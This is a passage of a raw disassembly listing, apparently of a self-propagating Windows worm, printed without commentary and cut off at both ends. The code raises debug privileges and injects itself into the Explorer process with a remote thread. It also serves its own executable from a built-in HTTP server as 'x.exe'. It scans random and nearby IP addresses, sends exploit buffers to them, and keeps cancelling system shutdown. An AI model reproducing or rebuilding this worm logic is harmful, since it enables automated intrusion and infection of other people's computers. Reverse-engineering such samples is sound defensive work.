[ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 0A0h push offset dword_31424868 push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C cmp [ebp+arg_0], 0 jz loc_31421CE7 push 68h lea eax, [ebp+var_89E4] push offset dword_31424A20 push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_4834] push 1B5Ah push eax lea eax, [ebp+var_897C] push eax call sub_31422CE2 ; memcpy push 70h lea eax, [ebp+var_690C] push offset dword_31424A8C push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_37A0] push 0A5Eh push eax lea eax, [ebp+var_689C] push eax call sub_31422CE2 ; memcpy push 84h lea eax, [ebp+var_5DD8] push offset dword_31424B00 push eax call sub_31422CE2 ; memcpy add esp, 3Ch lea eax, [ebp+var_89E4] push 0 push 10FCh push eax push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 0FDCh lea eax, [ebp+var_690C] jmp loc_31421D3F ; --------------------------------------------------------------------------- loc_31421BF7: ; CODE XREF: sub_31421801+22Bj push 0DACh lea eax, [ebp+var_2CD8] push 90h push eax mov [ebp+arg_0], 1 call sub_31422CD6 ; memset push 4 lea eax, [ebp+var_24F4] push offset dword_31424BF8 push eax call sub_31422CE2 ; memcpy push offset byte_314242B8 call sub_31422CDC ; strlen push eax lea eax, [ebp+var_24E4] push offset byte_314242B8 push eax call sub_31422CE2 ; memcpy push 4 lea eax, [ebp+var_21C0] push offset loc_31424C70 push eax call sub_31422CE2 ; memcpy push 4 lea eax, [ebp+var_21BC] push offset dword_31424BF8 push eax call sub_31422CE2 ; memcpy add esp, 40h push offset byte_314242B8 call sub_31422CDC ; strlen push eax lea eax, [ebp+var_21B0] push offset byte_314242B8 push eax call sub_31422CE2 ; memcpy add esp, 10h xor ecx, ecx lea eax, [ebp+var_4833] loc_31421C93: ; CODE XREF: sub_31421801+4A8j mov dl, [ebp+ecx+var_2CD8] mov [eax-1], dl and byte ptr [eax], 0 inc ecx inc eax inc eax cmp ecx, 0DACh jl short loc_31421C93 and [ebp+var_2CDC], 0 and [ebp+var_2CDB], 0 push 1C52h lea eax, [ebp+var_89E4] push 31h push eax call sub_31422CD6 ; memset push 1C52h lea eax, [ebp+var_690C] push 31h push eax call sub_31422CD6 ; memset add esp, 18h jmp loc_31421A98 ; --------------------------------------------------------------------------- loc_31421CE7: ; CODE XREF: sub_31421801+339j push 7Ch lea eax, [ebp+var_1F28] push offset dword_3142490C push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_F44] push 7D0h push eax lea eax, [ebp+var_1EAC] push eax call sub_31422CE2 ; memcpy push 90h lea eax, [ebp+var_16DC] push offset dword_3142498C push eax call sub_31422CE2 ; memcpy add esp, 24h and [ebp+var_1231], 0 lea eax, [ebp+var_1F28] push 0 push 0CF8h loc_31421D3F: ; CODE XREF: sub_31421801+3F1j push eax push [ebp+var_4] call ebx ; send push edi call esi ; Sleep and [ebp+var_C], 0 loc_31421D4C: ; CODE XREF: sub_31421801+1ADj ; sub_31421801+1E1j ... push 2 push [ebp+var_4] call dword_31421170 ; shutdown loc_31421D57: ; CODE XREF: sub_31421801+166j push [ebp+var_4] call dword_31421174 ; closesocket pop esi loc_31421D61: ; CODE XREF: sub_31421801+37j mov eax, [ebp+var_C] pop edi pop ebx leave retn sub_31421801 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421D68 proc near ; CODE XREF: UPX0:loc_31422376p var_1C = dword ptr -1Ch var_18 = byte ptr -18h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 1Ch push esi push edi push offset aAdvapi32 ; "advapi32" call dword_314210A8 ; LoadLibraryA mov esi, dword_314210A4 mov edi, eax push offset aOpenprocesstok ; "OpenProcessToken" push edi call esi ; GetProcAddress test eax, eax mov [ebp+var_4], eax jz short loc_31421DEC push offset aLookupprivileg ; "LookupPrivilegeValueA" push edi call esi ; GetProcAddress test eax, eax mov [ebp+var_8], eax jz short loc_31421DEC push offset aAdjusttokenpri ; "AdjustTokenPrivileges" push edi call esi ; GetProcAddress mov esi, eax test esi, esi jz short loc_31421DEC lea eax, [ebp+var_C] push eax push 20h call dword_314210A0 ; GetCurrentProcess push eax call [ebp+var_4] lea eax, [ebp+var_18] mov [ebp+var_1C], 1 push eax push offset aSedebugprivile ; "SeDebugPrivilege" push 0 mov [ebp+var_10], 2 call [ebp+var_8] push 0 push 0 lea eax, [ebp+var_1C] push 10h push eax push 0 push [ebp+var_C] call esi ; GetProcAddress loc_31421DEC: ; CODE XREF: sub_31421D68+28j ; sub_31421D68+37j ... pop edi pop esi leave retn sub_31421D68 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421DF0 proc near ; CODE XREF: UPX0:3142238Ap var_18 = byte ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 18h mov ecx, dword_31425000 and [ebp+var_4], 0 push ebx push esi mov eax, [ecx+3Ch] push edi add eax, ecx push offset aKernel32 ; "kernel32" mov ecx, [eax+34h] mov edi, [eax+50h] mov [ebp+var_C], ecx call dword_314210B4 ; GetModuleHandleA mov esi, dword_314210A4 mov ebx, eax push offset aVirtualallocex ; "VirtualAllocEx" push ebx call esi ; GetProcAddress test eax, eax mov [ebp+var_10], eax jnz short loc_31421E37 loc_31421E33: ; CODE XREF: sub_31421DF0+54j push 1 jmp short loc_31421E88 ; --------------------------------------------------------------------------- loc_31421E37: ; CODE XREF: sub_31421DF0+41j push offset aCreateremoteth ; "CreateRemoteThread" push ebx call esi ; GetProcAddress test eax, eax mov [ebp+var_14], eax jz short loc_31421E33 push 0 push offset aShell_traywnd ; "Shell_TrayWnd" call dword_31421110 ; FindWindowA test eax, eax jnz short loc_31421E65 call dword_31421114 ; GetForegroundWindow test eax, eax jnz short loc_31421E65 push 2 jmp short loc_31421E88 ; --------------------------------------------------------------------------- loc_31421E65: ; CODE XREF: sub_31421DF0+65j ; sub_31421DF0+6Fj lea ecx, [ebp+var_8] push ecx push eax call dword_31421118 ; GetWindowThreadProcessId push [ebp+var_8] push 0 push 42Ah call dword_314210B0 ; OpenProcess mov ebx, eax test ebx, ebx jnz short loc_31421E8B push 3 loc_31421E88: ; CODE XREF: sub_31421DF0+45j ; sub_31421DF0+73j pop eax jmp short loc_31421EF6 ; --------------------------------------------------------------------------- loc_31421E8B: ; CODE XREF: sub_31421DF0+94j push 4 push 3000h push edi push [ebp+var_C] push ebx call [ebp+var_10] mov esi, dword_3142107C test eax, eax jz short loc_31421EE9 lea ecx, [ebp+var_10] push ecx push edi push eax push eax push ebx call dword_314210AC ; WriteProcessMemory push dword_31424FF4 call esi ; CloseHandle lea eax, [ebp+var_18] xor edi, edi push eax push edi push 1 push [ebp+arg_0] push edi push edi push ebx call [ebp+var_14] cmp eax, edi jz short loc_31421ED5 push eax call esi ; CloseHandle jmp short loc_31421EF0 ; --------------------------------------------------------------------------- loc_31421ED5: ; CODE XREF: sub_31421DF0+DEj push offset aUterm192 ; "uterm19-2" call sub_31421F29 pop ecx mov [ebp+var_4], 5 jmp short loc_31421EF0 ; --------------------------------------------------------------------------- loc_31421EE9: ; CODE XREF: sub_31421DF0+B2j mov [ebp+var_4], 4 loc_31421EF0: ; CODE XREF: sub_31421DF0+E3j ; sub_31421DF0+F7j push ebx call esi ; CloseHandle mov eax, [ebp+var_4] loc_31421EF6: ; CODE XREF: sub_31421DF0+99j pop edi pop esi pop ebx leave retn sub_31421DF0 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421EFB proc near ; CODE XREF: sub_314221C4+Bp ; UPX0:3142234Cp ... var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp push ecx push ecx push ebx push esi push edi pusha rdtsc mov [ebp+var_8], eax popa mov [ebp+var_4], esp call dword_314210B8 ; GetTickCount mov ecx, [ebp+var_4] imul ecx, [ebp+var_8] add eax, ecx push eax call dword_314210EC ; srand pop ecx pop edi pop esi pop ebx leave retn sub_31421EFB endp ; =============== S U B R O U T I N E ======================================= sub_31421F29 proc near ; CODE XREF: sub_31421DF0+EAp ; UPX0:31422356p ... arg_0 = dword ptr 4 push [esp+arg_0] push 1 push 0 call dword_314210BC ; CreateMutexA retn sub_31421F29 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421F38 proc near ; CODE XREF: sub_314223B2+155p ; sub_314223B2+160p ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp lea eax, [ebp+arg_4] push eax xor eax, eax push eax push [ebp+arg_4] push [ebp+arg_0] push eax push eax call dword_314210C0 ; CreateThread pop ebp retn sub_31421F38 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421F52 proc near ; CODE XREF: sub_314221C4+12Cp ; sub_314225C3+5Ap ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp lea eax, [ebp+arg_4] push eax xor eax, eax push eax push [ebp+arg_4] push [ebp+arg_0] push eax push eax call dword_314210C0 ; CreateThread push eax call dword_3142107C ; CloseHandle pop ebp retn sub_31421F52 endp ; =============== S U B R O U T I N E ======================================= sub_31421F73 proc near ; CODE XREF: sub_314211A0+68p ; sub_31422A9B+3Bp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 push ebx mov ebx, [esp+4+arg_0] push esi push edi mov edi, [esp+0Ch+arg_4] xor esi, esi test edi, edi jle short loc_31421F9B loc_31421F84: ; CODE XREF: sub_31421F73+26j call dword_314210FC ; rand push 1Ah cdq pop ecx idiv ecx add dl, 61h mov [esi+ebx], dl inc esi cmp esi, edi jl short loc_31421F84 loc_31421F9B: ; CODE XREF: sub_31421F73+Fj and byte ptr [ebx+edi], 0 pop edi pop esi pop ebx retn sub_31421F73 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421FA3 proc near ; CODE XREF: sub_314211A0+105p var_54 = dword ptr -54h var_24 = word ptr -24h var_10 = dword ptr -10h var_C = dword ptr -0Ch arg_0 = dword ptr 8 arg_4 = word ptr 0Ch push ebp mov ebp, esp sub esp, 54h push esi push edi push 44h xor esi, esi pop edi lea eax, [ebp+var_54] push edi push esi push eax call sub_31422CD6 ; memset mov ax, [ebp+arg_4] add esp, 0Ch mov [ebp+var_24], ax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_54] push eax push esi push esi push esi push esi push esi push esi mov [ebp+var_54], edi push [ebp+arg_0] push esi call dword_314210C4 ; CreateProcessA push [ebp+var_C] mov esi, dword_3142107C mov edi, eax call esi ; CloseHandle push [ebp+var_10] call esi ; CloseHandle mov eax, edi pop edi pop esi leave retn sub_31421FA3 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421FF9 proc near ; CODE XREF: sub_3142264B+3Ep ; sub_31422712+7p ... var_34 = byte ptr -34h push ebp mov ebp, esp sub esp, 34h lea eax, [ebp+var_34] push 31h push eax call dword_3142114C ; gethostname cmp eax, 0FFFFFFFFh jnz short loc_3142201A call dword_31421150 ; WSAGetLastError xor eax, eax leave retn ; --------------------------------------------------------------------------- loc_3142201A: ; CODE XREF: sub_31421FF9+15j lea eax, [ebp+var_34] push eax call dword_31421154 ; gethostbyname test eax, eax jnz short loc_3142202F mov eax, 100007Fh leave retn ; --------------------------------------------------------------------------- loc_3142202F: ; CODE XREF: sub_31421FF9+2Dj mov eax, [eax+0Ch] mov eax, [eax] mov eax, [eax] leave retn sub_31421FF9 endp ; =============== S U B R O U T I N E ======================================= sub_31422038 proc near ; CODE XREF: sub_314216A2+12p ; sub_3142255F+22p ... var_4 = byte ptr -4 push ecx lea eax, [esp+4+var_4] push 0 push eax call dword_31421130 ; InternetGetConnectedState neg eax sbb eax, eax neg eax pop ecx retn sub_31422038 endp ; =============== S U B R O U T I N E ======================================= sub_3142204E proc near ; CODE XREF: sub_314223B2+E6p arg_0 = dword ptr 4 push [esp+arg_0] push 0 push 2 call dword_314210CC ; OpenEventA test eax, eax jz short locret_31422067 push eax call dword_314210C8 ; SetEvent locret_31422067: ; CODE XREF: sub_3142204E+10j retn sub_3142204E endp ; =============== S U B R O U T I N E ======================================= sub_31422068 proc near ; CODE XREF: sub_314216A2+68p push esi mov esi, dword_314210FC push edi call esi ; rand mov edi, eax shl edi, 10h call esi ; rand or eax, edi pop edi pop esi retn sub_31422068 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142207E proc near ; DATA XREF: sub_314221C4+127o var_200 = byte ptr -200h var_100 = byte ptr -100h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 200h push ebx mov ebx, [ebp+arg_0] push esi push edi xor edi, edi lea eax, [ebp+var_100] push edi push 100h push eax push ebx call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jnz short loc_314220AF push 1 jmp loc_3142216A ; --------------------------------------------------------------------------- loc_314220AF: ; CODE XREF: sub_3142207E+28j mov esi, dword_31421104 lea eax, [ebp+var_100] push offset aGet ; "GET" push eax call esi ; strstr pop ecx test eax, eax pop ecx jz loc_3142217A lea eax, [ebp+var_100] push offset dword_314241F0 push eax call esi ; strstr pop ecx test eax, eax pop ecx jz loc_3142217A mov esi, dword_31421168 push 0 push 3Dh push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"... push ebx call esi ; send push dword_31424FF0 lea eax, [ebp+var_200] push offset aContentLengthU ; "Content-Length: %u\r\n\r\n" push eax call dword_3142111C ; wsprintfA add esp, 0Ch lea eax, [ebp+var_200] push 0 push eax call sub_31422CDC ; strlen pop ecx push eax lea eax, [ebp+var_200] push eax push ebx call esi ; send loc_3142212C: ; CODE XREF: sub_3142207E+E8j mov eax, dword_31424FF0 mov ecx, 1000h sub eax, edi cmp eax, ecx jb short loc_3142213E mov eax, ecx loc_3142213E: ; CODE XREF: sub_3142207E+BCj test eax, eax jz short loc_3142216D push 0 push eax mov eax, dword_31424FE8 add eax, edi push eax push ebx call esi ; send cmp eax, 0FFFFFFFFh jz short loc_31422168 cmp eax, 1000h jb short loc_3142216D push 64h add edi, eax call dword_31421094 ; Sleep jmp short loc_3142212C ; --------------------------------------------------------------------------- loc_31422168: ; CODE XREF: sub_3142207E+D5j push 2 loc_3142216A: ; CODE XREF: sub_3142207E+2Cj pop eax jmp short loc_314221BD ; --------------------------------------------------------------------------- loc_3142216D: ; CODE XREF: sub_3142207E+C2j ; sub_3142207E+DCj push offset dword_31424FEC call dword_314210D4 ; InterlockedIncrement jmp short loc_31422198 ; --------------------------------------------------------------------------- loc_3142217A: ; CODE XREF: sub_3142207E+49j ; sub_3142207E+61j mov esi, dword_31421168 push 0 push 15h push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n" push ebx call esi ; send push 0 push 3 push offset dword_31424D3C push ebx call esi ; send loc_31422198: ; CODE XREF: sub_3142207E+FAj push 7D0h call dword_31421094 ; Sleep push 2 push ebx call dword_31421170 ; shutdown push ebx call dword_31421174 ; closesocket push 0 call dword_314210D0 ; ExitThread xor eax, eax loc_314221BD: ; CODE XREF: sub_3142207E+EDj pop edi pop esi pop ebx leave retn 4 sub_3142207E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314221C4 proc near ; DATA XREF: sub_314223B2+150o var_130 = byte ptr -130h var_28 = byte ptr -28h var_18 = word ptr -18h var_16 = word ptr -16h var_14 = dword ptr -14h var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 130h push ebx push edi call sub_31421EFB lea eax, [ebp+var_130] push 104h push eax push offset aCryptographicS ; "Cryptographic Service" xor ebx, ebx push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... push 80000002h mov dword_31424FEC, ebx call sub_31422882 add esp, 14h test eax, eax jnz loc_314222F9 push esi push ebx push ebx push 3 push ebx push 1 lea eax, [ebp+var_130] push 80000000h push eax call dword_31421080 ; CreateFileA mov esi, eax cmp esi, 0FFFFFFFFh jnz short loc_31422230 push 1 call dword_314210D0 ; ExitThread loc_31422230: ; CODE XREF: sub_314221C4+62j push ebx push esi call dword_314210DC ; GetFileSize push eax mov dword_31424FF0, eax call sub_31422CA5 pop ecx mov dword_31424FE8, eax lea ecx, [ebp+var_4] push ebx push ecx push dword_31424FF0 push eax push esi call dword_314210D8 ; ReadFile mov eax, [ebp+var_4] push esi mov dword_31424FF0, eax call dword_3142107C ; CloseHandle push ebx push 1 push 2 call dword_31421158 ; socket push 10h mov edi, eax pop esi lea eax, [ebp+var_18] push esi push ebx push eax call sub_31422CD6 ; memset add esp, 0Ch mov [ebp+var_18], 2 mov [ebp+var_14], ebx loc_31422292: ; CODE XREF: sub_314221C4+E5j ; sub_314221C4+EDj ... call dword_314210FC ; rand add eax, 7D0h and eax, 1FFFh cmp al, bl mov dword_31424FFC, eax jz short loc_31422292 xor ecx, ecx mov cl, ah test cl, cl jz short loc_31422292 push eax call dword_31421160 ; htons mov [ebp+var_16], ax lea eax, [ebp+var_18] push esi push eax push edi call dword_31421140 ; bind test eax, eax jnz short loc_31422292 push 64h push edi call dword_31421144 ; listen mov [ebp+var_8], esi pop esi loc_314222DB: ; CODE XREF: sub_314221C4+133j lea eax, [ebp+var_8] push eax lea eax, [ebp+var_28] push eax push edi call dword_31421148 ; accept push eax push offset sub_3142207E call sub_31421F52 pop ecx pop ecx jmp short loc_314222DB ; --------------------------------------------------------------------------- loc_314222F9: ; CODE XREF: sub_314221C4+3Dj push ebx call dword_314210D0 ; ExitThread pop edi xor eax, eax pop ebx leave retn 4 sub_314221C4 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31422308 proc near ; CODE XREF: sub_314223B2:loc_314224FCp var_190 = byte ptr -190h push ebp mov ebp, esp sub esp, 190h lea eax, [ebp+var_190] push esi mov esi, dword_3142113C push eax push 2 call esi ; WSAStartup lea eax, [ebp+var_190] push eax push 102h call esi ; WSAStartup pop esi leave retn sub_31422308 endp ; --------------------------------------------------------------------------- loc_31422334: ; CODE XREF: UPX1:31427D08j push 0 call dword_314210B4 ; GetModuleHandleA push offset aFtpupd_exe ; "ftpupd.exe" mov dword_31425000, eax call dword_31421074 ; DeleteFileA call sub_31421EFB push offset aUterm192 ; "uterm19-2" call sub_31421F29 pop ecx mov dword_31424FF4, eax call dword_314210E4 ; RtlGetLastWin32Error cmp eax, 0B7h jnz short loc_31422376 push 1 call dword_314210E0 ; ExitProcess loc_31422376: ; CODE XREF: UPX0:3142236Cj call sub_31421D68 call sub_314229E6 call sub_31422B67 push offset sub_314223B2 call sub_31421DF0 test eax, eax pop ecx jz short loc_3142239B push 0 call sub_314223B2 loc_3142239B: ; CODE XREF: UPX0:31422392j xor eax, eax retn ; =============== S U B R O U T I N E ======================================= sub_3142239E proc near ; CODE XREF: sub_314223B2:loc_31422525p ; sub_3142255F:loc_31422578p ... push 0 push dword_31424FF8 call dword_31421070 ; WaitForSingleObject neg eax sbb eax, eax inc eax retn sub_3142239E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314223B2 proc near ; CODE XREF: UPX0:31422396p ; DATA XREF: UPX0:31422385o var_74 = dword ptr -74h var_70 = dword ptr -70h var_6C = dword ptr -6Ch var_68 = dword ptr -68h var_64 = dword ptr -64h var_60 = dword ptr -60h var_5C = dword ptr -5Ch var_58 = dword ptr -58h var_54 = dword ptr -54h var_50 = dword ptr -50h var_4C = dword ptr -4Ch var_48 = dword ptr -48h var_44 = dword ptr -44h var_40 = dword ptr -40h var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_34 = dword ptr -34h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_31421190 push offset loc_31422CD0 mov eax, large fs:0 push eax mov large fs:0, esp sub esp, 64h push ebx push esi push edi mov [ebp+var_70], offset aU10x ; "u10x" mov [ebp+var_6C], offset aU11x ; "u11x" mov [ebp+var_68], offset aU12x ; "u12x" mov [ebp+var_64], offset aU13x ; "u13x" mov [ebp+var_60], offset aU14x ; "u14x" mov [ebp+var_5C], offset aU15x ; "u15x" mov [ebp+var_58], offset aU16x ; "u16x" mov [ebp+var_54], offset aU17x ; "u17x" mov [ebp+var_50], offset aU18x ; "u18x" mov [ebp+var_4C], offset aU8 ; "u8" mov [ebp+var_48], offset aU9 ; "u9" mov [ebp+var_44], offset aU10 ; "u10" mov [ebp+var_40], offset aU11 ; "u11" mov [ebp+var_3C], offset aU12 ; "u12" mov [ebp+var_38], offset aU13 ; "u13" mov [ebp+var_34], offset aU13i ; "u13i" mov [ebp+var_30], offset aU14 ; "u14" mov [ebp+var_2C], offset aU15 ; "u15" mov [ebp+var_28], offset aU16 ; "u16" mov [ebp+var_24], offset aU17 ; "u17" mov [ebp+var_20], offset aU18 ; "u18" mov [ebp+var_1C], offset aU19 ; "u19" push offset aU192x ; "u19-2x" xor edi, edi push edi push 1 push edi call dword_3142106C ; CreateEventA mov dword_31424FF8, eax mov [ebp+var_4], edi mov [ebp+var_74], edi loc_3142248B: ; CODE XREF: sub_314223B2+EFj cmp [ebp+var_74], 9 jnb short loc_314224A3 mov eax, [ebp+var_74] push [ebp+eax*4+var_70] call sub_3142204E pop ecx inc [ebp+var_74] jmp short loc_3142248B ; --------------------------------------------------------------------------- loc_314224A3: ; CODE XREF: sub_314223B2+DDj mov [ebp+var_74], edi loc_314224A6: ; CODE XREF: sub_314223B2+10Aj cmp [ebp+var_74], 0Dh jnb short loc_314224BE mov eax, [ebp+var_74] push [ebp+eax*4+var_4C] call sub_31421F29 pop ecx inc [ebp+var_74] jmp short loc_314224A6 ; --------------------------------------------------------------------------- loc_314224BE: ; CODE XREF: sub_314223B2+F8j cmp [ebp+arg_0], edi jz short loc_314224FC push offset aWs2_32 ; "ws2_32" mov esi, dword_314210A8 call esi ; LoadLibraryA push offset aWininet ; "wininet" call esi ; LoadLibraryA push offset aMsvcrt ; "msvcrt" call esi ; LoadLibraryA push offset aAdvapi32 ; "advapi32" call esi ; LoadLibraryA push offset aUser32 ; "user32" call esi ; LoadLibraryA push offset aUterm192 ; "uterm19-2" call sub_31421F29 pop ecx mov dword_31424FF4, eax loc_314224FC: ; CODE XREF: sub_314223B2+10Fj call sub_31422308 push edi push offset sub_314221C4 call sub_31421F38 push edi push offset sub_314216A2 call sub_31421F38 push edi push offset loc_3142276E call sub_31421F38 add esp, 18h loc_31422525: ; CODE XREF: sub_314223B2+18Ej call sub_3142239E test eax, eax jnz short loc_31422542 push edi call dword_31421018 ; AbortSystemShutdownA push 1388h call dword_31421094 ; Sleep jmp short loc_31422525 ; --------------------------------------------------------------------------- loc_31422542: ; CODE XREF: sub_314223B2+17Aj or [ebp+var_4], 0FFFFFFFFh call nullsub_2 xor eax, eax mov ecx, [ebp+var_10] mov large fs:0, ecx pop edi pop esi pop ebx leave retn 4 sub_314223B2 endp ; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND] ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142255F proc near ; DATA XREF: sub_314225C3+55o ; sub_3142264B+6Ao ... var_1 = byte ptr -1 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx cmp byte ptr [ebp+arg_0], 7Fh jnz short loc_3142256E push 1 pop eax jmp short locret_314225BF ; --------------------------------------------------------------------------- loc_3142256E: ; CODE XREF: sub_3142255F+8j mov al, byte ptr [ebp+arg_0+3] push ebx push esi mov [ebp+var_1], al xor bl, bl loc_31422578: ; CODE XREF: sub_3142255F+5Aj call sub_3142239E test eax, eax jnz short loc_314225BB call sub_31422038 test eax, eax jz short loc_314225BB cmp [ebp+var_1], bl jz short loc_314225B4 mov byte ptr [ebp+arg_0+3], bl push [ebp+arg_0] call sub_31421801 movzx esi, word_3142500C pop ecx call dword_314210FC ; rand cdq idiv esi add edx, esi push edx call dword_31421094 ; Sleep loc_314225B4: ; CODE XREF: sub_3142255F+2Ej inc bl cmp bl, 0FFh jb short loc_31422578 loc_314225BB: ; CODE XREF: sub_3142255F+20j ; sub_3142255F+29j pop esi xor eax, eax pop ebx locret_314225BF: ; CODE XREF: sub_3142255F+Dj leave retn 4 sub_3142255F endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314225C3 proc near ; DATA XREF: sub_3142264B+7Eo ; UPX0:31422803o arg_0 = dword ptr 8 push ebp mov ebp, esp cmp byte ptr [ebp+arg_0], 7Fh jnz short loc_314225D1 push 1 pop eax jmp short loc_31422647 ; --------------------------------------------------------------------------- loc_314225D1: ; CODE XREF: sub_314225C3+7j push ebx push esi push edi call sub_31421EFB mov esi, dword_314210FC xor ebx, ebx loc_314225E1: ; CODE XREF: sub_314225C3+7Dj call sub_3142239E test eax, eax jnz short loc_31422642 call sub_31422038 test eax, eax jz short loc_31422642 call esi ; rand mov byte ptr [ebp+arg_0+2], al call esi ; rand push offset dword_31425004 mov byte ptr [ebp+arg_0+3], al call dword_314210D4 ; InterlockedIncrement push [ebp+arg_0] call sub_31421801 test eax, eax pop ecx jnz short loc_31422624 push [ebp+arg_0] push offset sub_3142255F call sub_31421F52 pop ecx pop ecx loc_31422624: ; CODE XREF: sub_314225C3+50j movzx edi, word_3142500C call esi ; rand cdq idiv edi add edx, edi push edx call dword_31421094 ; Sleep inc ebx cmp ebx, 8000h jl short loc_314225E1 loc_31422642: ; CODE XREF: sub_314225C3+25j ; sub_314225C3+2Ej pop edi pop esi xor eax, eax pop ebx loc_31422647: ; CODE XREF: sub_314225C3+Cj pop ebp retn 4 sub_314225C3 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142264B proc near ; DATA XREF: UPX0:3142281Bo var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp push ecx push ecx call sub_31421EFB call sub_3142239E test eax, eax jnz loc_31422704 push ebx mov ebx, dword_31421094 push esi mov esi, dword_314210FC push edi loc_31422671: ; CODE XREF: sub_3142264B+48j ; sub_3142264B+B0j call esi ; rand mov byte ptr [ebp+var_4+1], al call esi ; rand mov byte ptr [ebp+var_4+3], al call esi ; rand mov byte ptr [ebp+var_4+2], al loc_31422680: ; CODE XREF: sub_3142264B+3Cj call esi ; rand cmp al, 7Fh mov byte ptr [ebp+var_4], al jz short loc_31422680 call sub_31421FF9 mov edi, [ebp+var_4] cmp edi, eax jz short loc_31422671 call sub_31422038 test eax, eax jz short loc_314226DC push offset dword_31425004 call dword_314210D4 ; InterlockedIncrement push edi call sub_31421801 test eax, eax pop ecx jnz short loc_314226E3 push edi push offset sub_3142255F call sub_31421F52 pop ecx mov [ebp+var_8], 4 pop ecx loc_314226C8: ; CODE XREF: sub_3142264B+8Dj push edi push offset sub_314225C3 call sub_31421F52 dec [ebp+var_8] pop ecx pop ecx jnz short loc_314226C8 jmp short loc_314226E3 ; --------------------------------------------------------------------------- loc_314226DC: ; CODE XREF: sub_3142264B+51j push 2710h call ebx ; Sleep loc_314226E3: ; CODE XREF: sub_3142264B+67j ; sub_3142264B+8Fj movzx edi, word_3142500C call esi ; rand cdq idiv edi add edx, edi push edx call ebx ; Sleep call sub_3142239E test eax, eax jz loc_31422671 pop edi pop esi pop ebx loc_31422704: ; CODE XREF: sub_3142264B+11j push 0 call dword_314210D0 ; ExitThread xor eax, eax leave retn 4 sub_3142264B endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31422712 proc near ; CODE XREF: UPX0:314227E0p ; UPX0:loc_31422846p var_50 = byte ptr -50h var_28 = byte ptr -28h push ebp mov ebp, esp sub esp, 50h push esi call sub_31421FF9 push eax call dword_3142115C ; inet_ntoa mov esi, dword_31421068 push eax lea eax, [ebp+var_28] push eax call esi ; lstrcpy push dword_31424FFC lea eax, [ebp+var_28] push eax lea eax, [ebp+var_50] push offset aHttpSDX_exe ; "http://%s:%d/x.exe" push eax call dword_3142111C ; wsprintfA add esp, 10h lea eax, [ebp+var_50] push eax push offset word_314242BA call esi ; lstrcpy push offset byte_314242B8 call dword_31421084 ; lstrlen mov byte_314242B8[eax], 0DFh pop esi leave retn sub_31422712 endp ; --------------------------------------------------------------------------- loc_3142276E: ; DATA XREF: sub_314223B2+166o push ecx push ecx push ebx push ebp push esi xor ebx, ebx push edi mov dword_31425004, ebx call sub_31422038 mov esi, dword_31421094 mov edi, 1388h test eax, eax jnz short loc_3142279C loc_31422790: ; CODE XREF: UPX0:3142279Aj push edi call esi ; Sleep call sub_31422038 test eax, eax jz short loc_31422790 loc_3142279C: ; CODE XREF: UPX0:3142278Ej lea eax, [esp+14h] push ebx push eax call dword_31421130 ; InternetGetConnectedState test byte ptr [esp+14h], 2 push 50h mov dword_31425008, ebx pop ebp mov word_3142500C, 96h jz short loc_314227D9 mov dword_31425008, 1 mov ebp, 15Eh mov word_3142500C, 14h loc_314227D9: ; CODE XREF: UPX0:314227BFj call sub_31421FF9 mov ebx, eax call sub_31422712 cmp ebx, 